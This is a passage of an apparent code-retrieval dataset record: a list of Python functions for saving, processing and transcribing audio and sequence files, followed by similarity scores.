samps.shape[1]:\n\t\tsamps = np.transpose(samps)\n\t\tsamps = np.squeeze(samps)\n\t# same as MATLAB and kaldi\n\tif normalize:\n\t\tsamps = samps * MAX_INT16\n\t\tsamps = samps.astype(np.int16)\n\tfdir = os.path.dirname(fname)\n\tif fdir and not os.path.exists(fdir):\n\t\tos.makedirs(fdir)\n\t# NOTE: librosa 0.6.0 seems could not write non-float narray\n\t# so use scipy.io.wavfile instead\n\twavfile.write(fname, sampling_rate, samps)", "def tonify(self, tone_generator=None, verbose=False):\n if tone_generator is None:\n tone_generator = ToneGenerator('tonifyoutput.wav')\n tone_generator.file.setnchannels(len(self.sheets))\n # Find the max length (in seconds) of the data sheets\n max_length = 0.0\n for sheet in self.sheets:\n if len(sheet) > max_length:\n max_length = len(sheet)\n nframes = int(max_length * tone_generator.sample_rate)\n tone_generator.file.setnframes(nframes)\n\n tone_strs = []\n for d in self.sheets:\n if verbose:\n print \"File:\", d.data.name\n print \"Frequencies:\", self.freqs[self.sheets.index(d)]\n values = []\n tone_generator.setfreqs(self.freqs[self.sheets.index(d)])\n for i in range(0, len(d.times)):\n duration = d.durations[i]\n calls = d.calls[i]\n if verbose:\n print \"\\ttone: (%d, %d, %d) for %f seconds\" % (calls[0], calls[1],\n calls[2], duration)\n tone = tone_generator.get_tone((calls[0], calls[1], calls[2]), duration)\n values.append(str(tone))\n try:\n delta = float((d.times[i + 1] - d.times[i]).seconds)\n if float(delta) - duration < 0.0:\n silence_duration = 0.0\n else:\n silence_duration = float(delta) - duration\n except IndexError:\n break\n if verbose:\n print \"\\tsilence for\", silence_duration,\"seconds\"\n silence = tone_generator.get_silence(silence_duration)\n values.append(str(silence))\n if len(d) < max_length:\n end_silence = tone_generator.get_silence(max_length - len(d))\n values.append(str(end_silence))\n value_str = ''.join(values)\n 
tone_strs.append(value_str)\n \n if verbose:\n print \"Writing to file... (may take several minutes)\"\n combined = interleave_binarystr(tone_strs)\n tone_generator.file.writeframes(combined)\n if verbose:\n print \"Finished writing.\"\n tone_generator.close()", "def transcribe_audio_file(filename):\n url = 'https://api.nexiwave.com/SpeechIndexing/file/storage/' + USERNAME +'/recording/?authData.passwd=' + PASSWORD + '&auto-redirect=true&response=application/json'\n\n # To receive transcript in plain text, instead of html format, comment this line out (for SMS, for example)\n #url = url + '&transcriptFormat=html'\n\n\n # Ready to send:\n sys.stderr.write(\"Send audio for transcript with \" + url + \"\\n\")\n r = requests.post(url, files={'mediaFileData': open(filename,'rb')})\n data = r.json()\n transcript = data['text']\n foo = data['text']\n f = open('newf.txt', 'w')\n f.write(foo)\n f.close() \n # Perform your magic here:\n print \"Transcript for \"+filename+\"=\" + transcript", "def verb(filename,l,t,d,wout=True): #l = predelay d= decay smaller = less decay, t= number of delays\n#low l turns into chorus\n start=time.time()\n n, data, data_dB,sr,ch=inputwav(filename)\n data_ex=np.zeros(((n+l*t),ch))\n data_ex[0:n,:]=data\n data_Rex=np.zeros((len(data_ex),t,ch))\n print('Applying reverb...')\n for k in range (ch):\n for i in range (len(data)):\n for j in range(t):\n data_Rex[i+l*(j+1),j,k]=data_ex[i,k]*np.exp(-d*(j+1))\n data_F=data_ex\n print('Mixing...')\n for i in range (t):\n data_F=data_F+1*data_Rex[:,i,:]\n data_F=1*data_F\n data_verb=data_F+data_ex\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_verbed.wav',data_verb,sr,'PCM_16')\n print('Done!')\n end=time.time()\n elapsed=int(1000*(end-start))\n print('...............................')\n print('Completed in '+str(elapsed)+' milliseconds.')\n return data_verb", "def dir_resolution(self, src_path, frag_length=128):\n src_path = os.path.join(self.root_path, src_path)\n files = os.listdir(src_path)\n\n MFCCs = None\n labels = None\n cnt = 1\n total_num = len(files)\n for wav in files:\n wav_path = os.path.join(src_path, wav)\n MFCCs_each, labels_each = self.features_and_labels(wav_path, frag_length)\n if MFCCs is not None:\n MFCCs = torch.cat((MFCCs, MFCCs_each))\n labels = torch.cat((labels, labels_each))\n else:\n MFCCs, labels = MFCCs_each, labels_each\n\n if cnt % 1000 == 0:\n print('{} data pieces have been loaded in and {} are left'.format(cnt, total_num-cnt))\n cnt += 1\n\n np.save(self.feature_file, MFCCs.numpy()) \n np.save(self.label_file, labels.numpy())\n print('Loading into files finished!')", "def RecordFile(self, duration, num_channels, file_path):\n session.console.info('RecordFile : %s.', file_path)\n with file_utils.UnopenedTemporaryFile() as record_path, \\\n self._dut.temp.TempFile() as dut_record_path:\n self._dut.audio.RecordRawFile(dut_record_path, self._in_card,\n self._in_device, duration, num_channels,\n 48000)\n self._dut.link.Pull(dut_record_path, record_path)\n audio_utils.TrimAudioFile(in_path=record_path, out_path=file_path,\n start=_DEFAULT_TRIM_SECONDS, end=None,\n num_channels=num_channels)", "def __newSampleFile(self):\n self.__newFileName()\n self.__sampleFile = wav.open(self.__fileName, self.OPEN_MODE)\n self.__sampleFile.setnchannels(NUM_CHANNELS)\n self.__sampleFile.setsampwidth(self.__audio.get_sample_size(self.FORMAT))\n self.__sampleFile.setframerate(FS)", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if 
(name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def writeFastaFile(filename,sequences):\n fhw=open(filename,\"w\")\n for id in sequences:\n fhw.write(\">\"+id+\"\\n\"+sequences[id]+\"\\n\")\n fhw.close()", "def save_audio(ndarray, feature_name, out_path, x, y, new_labels, filename=None, sr=SR):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name, 'wav')\n librosa.output.write_wav(out_path / filename, ndarray, sr=sr, norm=True)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return filename", "def split_into_yaps(audio_seg, user_id, duration_slice=900000.0):\n l_audio_paths = []\n duration = len(audio_seg)\n rest = duration % duration_slice\n slice_number = duration // duration_slice - 1\n i = 0\n def get_interval(sub_audio, start, end):\n sub_audio = sub_audio[:end]\n if start != end:\n sub_audio = sub_audio[-start:]\n return sub_audio\n while slice_number >= i:\n d_info = {}\n new_file = get_interval(audio_seg, duration_slice, (i + 1) * duration_slice)\n to_upload = new_file.export()\n d_info['length'] = len(new_file)\n d_info['path'] = upload_file_to_s3(to_upload, user_id, \"yap_audio\", str(i))\n l_audio_paths.append(d_info)\n i += 1\n if rest:\n d_info = {}\n new_file = audio_seg[-rest:]\n to_upload = new_file.export()\n d_info['length'] = len(new_file)\n d_info['path'] = upload_file_to_s3(to_upload, user_id, \"yap_audio\", str(i))\n l_audio_paths.append(d_info)\n return l_audio_paths", "def store(self, filename):", "def enregistre_audio(\n audio: AudioSegment, \n chemin:str = 'animalese.wav',\n format:str ='wav'\n ) -> AudioSegment:\n\n which = pydub.utils.which\n\n if which(\"avconv\"):\n app = \"avconv\"\n elif which(\"ffmpeg\"):\n app = \"ffmpeg\"\n elif format not in {'raw', 'wav'}:\n raise FileNotFoundError(\"ffmpeg/avconv introuvable.\") \n\n return audio.export(chemin, format=format)", "def features_from_folder(label_folder, audio_folder, output_folder):\n print('Listing label files from folder.')\n #scan labels folder\n labels_list = os.listdir(label_folder)\n label_files = []\n for filename in labels_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'txt':\n continue\n #save to without its extension\n label_files.append(filename[:-4])\n\n print('Listing audio files from folder.')\n #scan audio folder\n audios_list = os.listdir(audio_folder)\n audio_files = []\n for filename in audios_list:\n #get its extension\n file_extension = filename.split('.')[-1]\n if file_extension != 'wav':\n continue\n #save to without its extension\n audio_files.append(filename[:-4])\n\n print('Removing files without matches')\n 
#use only the files with matching audio/label\n files_to_process = []\n for label_file in label_files:\n if label_file in audio_files:\n files_to_process.append(label_file)\n\n print('Processing each file...')\n i = 1\n class_count = {}\n total_f = len(files_to_process)\n #for each file\n for processing in files_to_process:\n print('File', str(i) + '/' + str(total_f))\n i += 1\n\n #\n label_file = os.path.join(label_folder, processing + \".txt\")\n audio_file = os.path.join(audio_folder, processing + \".wav\")\n\n #get the segments from the corresponding label file\n segments = get_segments(label_file)\n\n #\n total_s = len(segments)\n j = 1\n #for each segment\n for segment in segments:\n print('\\tSegment', str(j) + '/' + str(total_s), segment['class'])\n j += 1\n\n if class_count.get(segment['class']) is None:\n class_count[segment['class']] = 1\n else:\n class_count[segment['class']] += 1\n output_filename = segment['class']\n output_filename += '-' + format(class_count[segment['class']], '04d')\n output_filename = os.path.join(output_folder, output_filename)\n\n #get its features\n segment_features = features_from_label(audio_file, segment)\n\n #save it to a file\n fe.write_as_bin(output_filename, segment_features)", "def save_lod_files(files, filename, path=None, start_index=0):\n path = path_formatter(path)\n for i, target in enumerate(files):\n with open(\"{}{}_{}.mtxt\".format(path, filename, i + start_index),\n \"w\") as f:\n f.write(str(target))", "def save_to_file(filename: str, sequence: List[Sample]):\n\n with open(get_path() + \"/sequence/\" + filename, \"ab+\") as file:\n for sample in sequence:\n pickle.dump(sample, file, pickle.HIGHEST_PROTOCOL)", "def encode_and_save_files(\n subtokenizer, data_dir, raw_files, tag, total_shards):\n # Create a file for each shard.\n filepaths = [shard_filename(data_dir, tag, n + 1, total_shards)\n for n in range(total_shards)]\n\n if all_exist(filepaths):\n logging.info(\"Files with tag %s already exist.\" % tag)\n return filepaths\n\n logging.info(\"Saving files with tag %s.\" % tag)\n input_file = raw_files[0]\n target_file = raw_files[1]\n\n # Write examples to each shard in round robin order.\n tmp_filepaths = [six.ensure_str(fname) + \".incomplete\" for fname in filepaths]\n writers = [tf.python_io.TFRecordWriter(fname) for fname in tmp_filepaths]\n counter, shard = 0, 0\n for counter, (input_line, target_line) in enumerate(zip(\n txt_line_iterator(input_file), txt_line_iterator(target_file))):\n if counter > 0 and counter % 100000 == 0:\n logging.info(\"\\tSaving case %d.\" % counter)\n \n ids = subtokenizer.encode(input_line, add_eos=True)\n inputs, targets = drop_sequence(subtokenizer, ids)\n example = dict_to_example({\"inputs\": inputs, \"targets\": targets})\n\n writers[shard].write(example.SerializeToString())\n shard = (shard + 1) % total_shards\n for writer in writers:\n writer.close()\n\n for tmp_name, final_name in zip(tmp_filepaths, filepaths):\n tf.gfile.Rename(tmp_name, final_name)\n\n logging.info(\"Saved %d Examples\", counter + 1)\n return filepaths", "def manage_ident(filebasename, gmm, clusters):\n seg_f = open(\"%s.ident.%s.seg\" % (filebasename, gmm), \"r\")\n for line in seg_f:\n if line.startswith(\";;\"):\n# print line\n splitted_line = line.split()[1].split(':')[1].split('_')\n# print splitted_line\n try:\n cluster, speaker = splitted_line\n except:\n speaker = splitted_line[0]\n idx = line.index('score:' + speaker) + len('score:' + speaker + \" = \")\n iidx = line.index(']', idx) - 1\n value = 
line[idx:iidx]\n if not cluster in clusters:\n clusters[cluster] = Cluster(cluster, 'U', '0', '', cluster)\n clusters[cluster].add_speaker(speaker, value)\n seg_f.close()\n if not CONFIGURATION.KEEP_INTERMEDIATE_FILES:\n os.remove(\"%s.ident.%s.seg\" % (filebasename, gmm))", "def generate_segments(full_filename, summary=False):\n\n\t# split filename and create folder to store segments\n\tfilename, filetype = os.path.splitext(full_filename)\n\tfolder, filename = os.path.split(filename)\n\tif len(folder) > 0:\n\t\tfolder = folder+\"/\"\n\tif not os.path.isfile(folder+filename+filetype):\n\t\tprint(\"ERROR: File\", folder+filename+filetype, \"does not exist.\")\n\t\tsys.exit()\n\tif not os.path.exists(folder+\"segments\"):\n\t\tos.makedirs(folder+\"segments\")\n\n\t# set flags\n\tlast_new_segment = 0\t# frame at which segment began\n\twas_low = False\t\t\t# if hand left image since segment began\n\tlow_count = 0\t\t\t# consecutive frames for which hand was gone\n\tsegment = 0\t\t\t\t# segment id number\n\n\t# initialize summary/segment writers, set background as first frame\n\treader = imageio.get_reader(folder+filename+filetype, 'ffmpeg')\n\tfps = reader.get_meta_data()['fps']\n\tnframes = reader.get_meta_data()['nframes']\n\tsegment_writer = imageio.get_writer(\n\t\t\tfolder+\"segments/\"+filename+str(segment)+filetype, \n\t\t\t'ffmpeg', fps=fps, macro_block_size=None)\n\tsegment_writer.close()\n\tif summary:\n\t\tsummary_writer = imageio.get_writer(folder+filename+\"_summary\"+filetype, \n\t\t\t'ffmpeg', fps=fps*2)\n\tbackground = np.array(reader.get_data(0)).astype(int)[:,:,0]\n\n\t# process video and segment\n\tfor i, image in enumerate(reader):\n\n\t\t# background subtract, threshold at zero\n\t\timage = np.array(image).astype(int)[:,:,0]\n\t\timage = np.maximum(image - background, np.zeros(image.shape))\n\n\t\t# check if at least 3 edge pixels belong to a hand\n\t\tif (np.sum(image[Y1:Y1+1, X0:X1] > HAND_CUTOFF) > 3 or \n\t\t\t\tnp.sum(image[Y0:Y0+1, X0:X1] > HAND_CUTOFF) > 3 or\n\t\t\t\tnp.sum(image[Y0:Y1, X0:X0+1] > HAND_CUTOFF) > 3 or\n\t\t\t\tnp.sum(image[Y0:Y1, X1:X1+1] > HAND_CUTOFF) > 3):\n\n\t\t\t# if hand just entered image and segment was long enough, start new segment\n\t\t\tif(i - last_new_segment > MIN_SEGMENT_LENGTH and was_low):\n\t\t\t\tif not segment_writer.closed:\n\t\t\t\t\tsegment_writer.close()\n\t\t\t\tsegment += 1\n\t\t\t\tsegment_writer = imageio.get_writer(\n\t\t\t\t\t\tfolder+\"segments/\"+filename+str(segment)+filetype, \n\t\t\t\t\t\t'ffmpeg', fps=fps, macro_block_size=None)\n\t\t\t\tlast_new_segment = i\n\t\t\t\twas_low = False\n\t\t\t\tlow_count = 0\n\n\t\telse: # hand isn't in image, after 1/10 second decide it has left\n\t\t\tlow_count += 1\n\t\t\tif low_count >= 3:\n\t\t\t\twas_low = True\n\t\t\t\n\t\t# segment has reached maximum length, end it\n\t\tif i - last_new_segment > MAX_SEGMENT_LENGTH:\n\t\t\tif not segment_writer.closed:\n\t\t\t\tsegment_writer.close()\n\n\t\t# add border for summary video around bounding area which is captured \n\t\timage[Y0-1,X0:X1] = WHITE*np.ones(X1-X0)\n\t\timage[Y1,X0:X1] = WHITE*np.ones(X1-X0)\n\t\timage[Y0:Y1,X0-1] = WHITE*np.ones(Y1-Y0)\n\t\timage[Y0:Y1,X1] = WHITE*np.ones(Y1-Y0)\n\n\t\t# record with segment/summary writers\n\t\tif not segment_writer.closed:\n\t\t\tsegment_writer.append_data(image[Y0:Y1,X0:X1].astype('uint8'))\n\t\t\tif summary:\n\t\t\t\tsummary_writer.append_data(image.astype('uint8'))\n\n\t\telse: # add lines to indicate not recording, add to summary writer\n\t\t\tfor x in range(X0, X1, 
10):\n\t\t\t\timage[Y0:Y1,x] = WHITE*np.ones(Y1-Y0)\n\t\t\tif summary:\n\t\t\t\tsummary_writer.append_data(image.astype('uint8'))\n\n\t\t# display progress processing video\n\t\tif i % 100 == 0:\n\t\t\tpercent = (i / nframes)\n\t\t\tbars = percent*40\n\t\t\tsys.stdout.write(\"\\rSegmenting {0}: [{1}{2}] {3}% \".format(\n\t\t\t\tfull_filename, \"|\"*int(bars), \" \"*int(40-bars), int(percent*100)))\n\t\t\tsys.stdout.flush()\n\n\t# close writers\n\tprint(\"\")\n\tsegment_writer.close()\n\tif summary:\n\t\tsummary_writer.close()", "def convert_files_sequential(self) -> None:\n for file in os.listdir(self.audios_dir):\n if file.endswith(self.input_format):\n self.convert_file(os.path.join(\n self.audios_dir, file), self.output_format)", "def divide_fasta_like_file(input_file, output_dir, ext=''):\n with open(input_file, 'r') as file:\n body = ''\n p_id = ''\n for line in file:\n if line[0] == '>':\n if len(p_id) > 0:\n with open(output_dir + p_id.replace(':', '_') + '.' + ext, \"w\") as out_file:\n out_file.write('>' + p_id.replace(':', '_') + '\\n' + body + '\\n')\n body = ''\n p_id = line.strip()[1:]\n else:\n body += line.strip()\n with open(output_dir + p_id.replace(':', '_') + '.' + ext, \"w\") as out_file:\n out_file.write('>' + p_id.replace(':', '_') + '\\n' + body + '\\n')", "def transform_audio(self, segment: Union[AudioSegment, SpeechSegment]) -> None:\n gain = self._rng.uniform(self._min_gain_dBFS, self._max_gain_dBFS)\n segment.gain_db(gain)", "def divide_fasta_file(input_file, output_dir, ext='', is_fasta=True):\n if not is_fasta:\n divide_fasta_like_file(input_file, output_dir, ext)\n return\n\n with open(input_file, 'r'):\n for seq_record in SeqIO.parse(input_file, \"fasta\"):\n with open(output_dir + str(seq_record.id).replace(':', '_') + '.' + ext, \"w\") as out_file:\n out_file.write('>' + str(seq_record.id) + '\\n' + str(seq_record.seq) + '\\n')", "def save_data(self, f): \n if not self.sampling:\n self.convert_to_array()\n np.save(f, self.reads)", "def snip(filename,s,e,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n st=int(s*44100)\n en=int(e*44100)\n data_s=data[st:en,:]\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_snipped.wav',data_s,sr,'PCM_16')\n print('Done!')\n return data_s", "def load_signal(DS, sampling ):\n my_db = ppg_db()\n\n file_records = list()\n\n # get all file in the Normal directory\n folder_name = 'Normal/'\n list_file = os.listdir(pathDB + folder_name)\n list_file.sort()\n\n for file in list_file:\n # check just file name\n if file[0:4] in DS:\n file_records.append(file)\n\n # get all file in the AF directory\n folder_name = 'AF/'\n list_file = os.listdir(pathDB + folder_name)\n list_file.sort()\n\n for file in list_file:\n #print(file[0:5])\n if file[0:5] in DS:\n file_records.append(file)\n\n # inialize variable\n class_ID = [[] for i in range(len(DS))]\n beat = [[] for i in range(len(DS))]\n valid_R = [ np.array([]) for i in range(len(DS))]\n\n for myFile in range(0, len(file_records)):\n print(\"Processing signal... 
\" + str(myFile) + \" / \" + str(len(file_records)) + \"...\")\n\n\n # check is each file is named with Normal or AF\n # print(file_records[myFile][0]) => N or A\n if (file_records[myFile][0] == 'N'):\n filename = pathDB + 'Normal/' + file_records[myFile]\n print(\"file name \" + str(filename))\n f = open(filename, 'rb')\n reader = csv.reader(f, delimiter=',')\n\n RAW_signal_N = []\n for row in reader:\n # save signal to list\n RAW_signal_N.append(float(row[0]))\n\n # iterate in signal\n selectedSignal = []\n for i in range(0,len(RAW_signal_N)):\n selectedSignal.append(RAW_signal_N[i])\n # sampling every 180 unit\n if( i % (sampling-1) == 0 and i > 0 ):\n beat[myFile].append(selectedSignal)\n class_ID[myFile].append(0) # label the beat for Normal\n selectedSignal = []\n\n\n elif(file_records[myFile][0] == 'A'):\n filename = pathDB + 'AF/' + file_records[myFile]\n print(filename)\n f = open(filename, 'rb')\n reader = csv.reader(f, delimiter=',')\n\n RAW_signal_AF = []\n for row in reader:\n # save signal to list\n RAW_signal_AF.append(float(row[0]))\n\n # iterate in signal\n selectedSignal = []\n for i in range(0, len(RAW_signal_AF)):\n selectedSignal.append(RAW_signal_AF[i])\n # sampling every 180 unit\n if (i % (sampling - 1) == 0 and i > 0):\n beat[myFile].append(selectedSignal)\n class_ID[myFile].append(1) # label the beat for AF\n selectedSignal = []\n\n print(\"Complete Load File\")\n my_db.filename = file_records\n my_db.beat = beat\n my_db.class_ID = class_ID\n\n return my_db", "def save_to_file(self, filename: str):\n prepare = asdict(self)\n for sequencer in prepare['Sequencers']:\n for step in sequencer['Sequence']:\n if 'Name' in step.keys() and step['Name'] == '':\n step.pop('Name')\n if 'StartingFrom' in step.keys():\n step['Repeat'] = {}\n step['Repeat']['StartingFrom'] = step['StartingFrom']\n step['Repeat']['Count'] = step['Count']\n step.pop('StartingFrom')\n step.pop('Count')\n pprint.sorted = lambda x, key=None: x\n text: str = pprint.pformat(prepare, indent=0)\n text = text.replace(r\"'\", \"\")\n text = text[1:-1]\n f = open(filename, \"w\", encoding='utf-8')\n f.write(text)", "def save_segmentation_samples(self, dest=\"./Datasets/BillboardSegmentation.seg\", song_indices=[0, 10, 20, 30, 40, 50, 60, 70], n_frames=500):\n data = []\n chords = []\n gold_targets = []\n # Iterate over all song indices on the input\n for song_ind in song_indices:\n\n # Convert data and chord targets to sequences\n data_in_seqs, targets_in_seqs = Dataset.songs_to_sequences(\n FEATURESs=[self.DATA[song_ind].CHROMA],\n CHORDs=[self.CHORDS[song_ind]],\n TIME_BINSs=[self.DATA[song_ind].TIME_BINS],\n KEYs=self.DESC[song_ind].TONIC,\n n_frames=n_frames,\n norm_to_C=False\n )\n\n # Add song's sequences to lists as a new element\n data.append(data_in_seqs)\n chords.append(targets_in_seqs)\n gold_targets.append(SegmentationCRNN.labels2changes(targets = chords[-1]))\n\n # Save all three np arrays generated in this function .. 
data, chords, gold_targets aka chord changes\n with lzma.open(dest, \"wb\") as dataset_file:\n pickle.dump((data, chords, gold_targets), dataset_file)\n\n print(\"[INFO] The Billboard segmentation samples was saved successfully.\")", "def noisy_data(filename, split='train', clf='gender'):\n\n filepath = 'data/{}/{}/{}o.wav'.format(clf, split, filename)\n audio, sr = librosa.load(filepath, sr=16000)\n \n # Add noise\n noisy = add_noise(audio)\n # Write noise to file\n sf.write('data/{}/{}/{}n.wav'.format(clf, split, filename), noisy, sr)\n #print(\"Noise added to {}\".format(filename))", "def _write(self, source, times=1, file_flag=False, rs_times=None, rs_step=None):\n # if the device isnt initialized properly\n if self._device is None:\n raise SpeakerError\n\n self._duration = None\n self._paused = False\n self._canceled = False\n\n try:\n periodsize = Speaker.PERIOD_SIZE\n\n if file_flag:\n # Open the wav file\n f = wave.open(self._fix_path(source), 'rb') # add error checking here\n\n channels = f.getnchannels()\n framerate = f.getframerate()\n sample_width = f.getsampwidth()\n\n # Read data from file\n data = []\n sample = f.readframes(periodsize)\n while sample:\n data.append(sample)\n sample = f.readframes(periodsize)\n\n # Close file\n f.close()\n else:\n channels = self._channels\n framerate = self.framerate\n sample_width = self.SAMPLE_WIDTH\n\n # Read data from encoded string\n n = len(source)\n step = sample_width * periodsize\n data = [source[i:i+step] for i in range(0, n, step)] # add error checking here\n\n # calculate the duration of the track\n packets = len(data)\n packet_duration = periodsize / self.framerate\n self._duration = (packets * packet_duration)\n\n # Set Device attributes for playback\n self._device.setchannels(channels) # add error checking here\n self._device.setrate(framerate)\n self._device.setperiodsize(periodsize)\n \n # 8bit is unsigned in wav files\n if sample_width == 1:\n self._device.setformat(alsaaudio.PCM_FORMAT_U8)\n # Otherwise we assume signed data, little endian\n elif sample_width == 2:\n self._device.setformat(alsaaudio.PCM_FORMAT_S16_LE)\n elif sample_width == 3:\n self._device.setformat(alsaaudio.PCM_FORMAT_S24_3LE)\n elif sample_width == 4:\n self._device.setformat(alsaaudio.PCM_FORMAT_S32_LE)\n else:\n raise ValueError('Unsupported format')\n\n # Play n times the data\n \n self._play(data, times, rs_times, rs_step) # add error checking here\n except alsaaudio.ALSAAudioError as e:\n print(f\"Caugh is write: {e}\")\n raise SpeakerError\n\n except Exception as e:\n print(f\"Caugh is write: {e}\")\n raise SpeakerError" ]
[ "0.5985446", "0.5802684", "0.57816744", "0.5737059", "0.5693634", "0.5681921", "0.55937463", "0.5582633", "0.5564124", "0.55507296", "0.55322385", "0.5512459", "0.55056393", "0.5496371", "0.54751974", "0.5456971", "0.5410829", "0.5401392", "0.53417194", "0.5321298", "0.53151065", "0.5279356", "0.5265418", "0.5257917", "0.5230108", "0.5228325", "0.5216217", "0.5215454", "0.52043396", "0.52029663", "0.5181512", "0.51600987", "0.5154388", "0.5148526", "0.5132983", "0.5129582", "0.5119381", "0.51178616", "0.5114473", "0.5112685", "0.5109354", "0.51016587", "0.508677", "0.5070801", "0.50675625", "0.5067164", "0.506604", "0.50587773", "0.50565034", "0.5054185", "0.5051101", "0.5051044", "0.5046169", "0.50432855", "0.5039611", "0.50354266", "0.50303763", "0.5018307", "0.5017526", "0.5011662", "0.5009963", "0.50019634", "0.49980593", "0.49963072", "0.4993138", "0.4985534", "0.49817908", "0.49718133", "0.49708998", "0.49673122", "0.4956893", "0.49564046", "0.49533015", "0.49530146", "0.49518892", "0.494921", "0.49373093", "0.49333853", "0.49332204", "0.4931836", "0.49315768", "0.49305362", "0.49151677", "0.4911439", "0.49076998", "0.4903929", "0.49036875", "0.4899635", "0.48990732", "0.48952445", "0.4891799", "0.48904127", "0.48740402", "0.48730284", "0.48691177", "0.4864257", "0.48626244", "0.48622626", "0.48588252", "0.48533323" ]
0.70655805
0
Load an audio file (or segment). Add random noise to the file and save with new filename.
def noisy_data(filename, split='train', clf='gender'): filepath = 'data/{}/{}/{}o.wav'.format(clf, split, filename) audio, sr = librosa.load(filepath, sr=16000) # Add noise noisy = add_noise(audio) # Write noise to file sf.write('data/{}/{}/{}n.wav'.format(clf, split, filename), noisy, sr) #print("Noise added to {}".format(filename))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def transform_audio(self, segment: Union[AudioSegment, SpeechSegment]) -> None:\n noise_data = self._rng.sample(self._noise_data, 1)[0]\n if noise_data[\"duration\"] < segment.duration:\n raise RuntimeError(\"The duration of sampled noise audio is smaller than the audio segment.\")\n diff_duration = noise_data[\"duration\"] - segment.duration\n start = self._rng.uniform(0, diff_duration)\n end = start + segment.duration\n noise_seg = AudioSegment.from_slice_file(noise_data[\"src\"], start=start, end=end)\n snr_dB = self._rng.uniform(self._min_snr_dB, self._max_snr_dB)\n segment.add_noise(noise_seg, snr_dB=snr_dB, allow_downsampling=True, rng=self._rng)", "def load_randomly_augmented_audio(path, sample_rate=16000, tempo_range=(0.85, 1.15),\n gain_range=(-6, 8)):\n low_tempo, high_tempo = tempo_range\n tempo_value = np.random.uniform(low=low_tempo, high=high_tempo)\n low_gain, high_gain = gain_range\n gain_value = np.random.uniform(low=low_gain, high=high_gain)\n audio = augment_audio_with_sox(path=path, sample_rate=sample_rate,\n tempo=tempo_value, gain=gain_value)\n return audio", "def __save(self,audio):\n self.__openSampleFile()\n self.__sampleFile.writeframes(audio)", "def trim_silence_file(file_path, noise_threshold=150):\n rate, audio = scipy.io.wavfile.read(file_path)\n trimmed_audio = trim_silence(audio, noise_threshold=noise_threshold)\n print()\n scipy.io.wavfile.write(file_path, rate, trimmed_audio)", "def audio_file_save(folder_path, current_time, data, name_by_date):\r\n\r\n name_by_time = current_time + '.wav' #timestamp for the audio file name\r\n usage = disk_usage(folder_path)\r\n if usage.used / usage.total < args.storage_threshold:\r\n file_path = os.path.join(folder_path, name_by_time)\r\n\r\n if args.resampling:\r\n sampling_rate = args.resampling_rate\r\n audio = audio_resampling(data)\r\n else:\r\n sampling_rate = args.recording_samplerate\r\n audio = data\r\n\r\n sf.write(file_path , audio, sampling_rate)\r\n\r\n else:\r\n name = os.path.join(folder_path, name_by_date + '.txt')\r\n f = open(name, 'a')\r\n f.write(current_time + '\\t Activity Detected \\n')\r\n f.close()", "def save_separated_audio(self, audios, filename):\n\n # Create folder with mixture name\n folder_path = os.path.join(self.config[\"separated_audio_folder\"], os.path.splitext(filename)[0])\n os.makedirs(folder_path)\n # Save each separated source\n for class_idx, audio in enumerate(audios):\n librosa.output.write_wav(os.path.join(folder_path, self.data_set.classes[class_idx]) + '.wav',\n audio.T,\n sr=self.data_set.config[\"sampling_rate\"])\n # Also copy the mixture in the folder\n copyfile(self.data_set.audio_full_filename(filename), os.path.join(folder_path, \"original_mix.wav\"))", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n 
os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def save_sample(file_path, sampling_rate, audio):\n audio = (audio.numpy() * 32768).astype(\"int16\")\n write(file_path, sampling_rate, audio)", "def random_sample(input_name):\n\t#Count number of lines in original file\n\twith open(input_name) as f:\n\t\told_size = len(f.readlines())\n\t#Determine number of lines for new file\n\tnew_size=int(round(sum(1 for row in open(input_name))* args.rnd_sample))\n\t#Create name for sub-sampled file\n\tSampledFileName, SampledExten = os.path.splitext(input_name)\n\tSampledName = '%s_smpld%s' % (SampledFileName,SampledExten)\n\t#Randomly select the desired number of lines and print to new file\n\twith open(SampledName,\"wb\") as sink:\n\t\tfor i in random.sample(range(0, old_size), new_size):\n\t\t\tsink.write(linecache.getline(input_name, i))\n\tlinecache.clearcache()", 